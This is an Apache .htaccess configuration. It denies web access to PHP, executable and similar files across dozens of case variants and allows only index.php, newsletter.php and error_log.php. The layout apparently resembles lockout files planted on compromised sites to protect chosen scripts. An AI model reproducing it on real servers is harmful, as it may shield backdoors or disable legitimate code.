Options -Indexes

<FilesMatch "\.(?:php|pHp|pht|phtml|phtm|php5|php72|phar|pgif|inc|sht|shtm|shtml|PHP|Php|PhP|PHp|pHP|phP|PHTML|Phtml|PHtml|PhTml|PhtMl|PhtmL|pHtml|pHTml|pHtMl|pHtmL|phTml|phTMl|phTmL|phtMl|phtML|PHT|Pht|PHt|PhT|pHt|pHT|py|exe|EXE|Exe|EXe|ExE|eXE|eXe|exE|phtml|PHTML|Phtml|PhTml|PhtMl|PhtmL|pHtml|pHtml|phTml|phtMl|phtmL|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>

<FilesMatch "^(index.php|newsletter.php|error_log.php)$">
Order allow,deny
Allow from all
</FilesMatch>
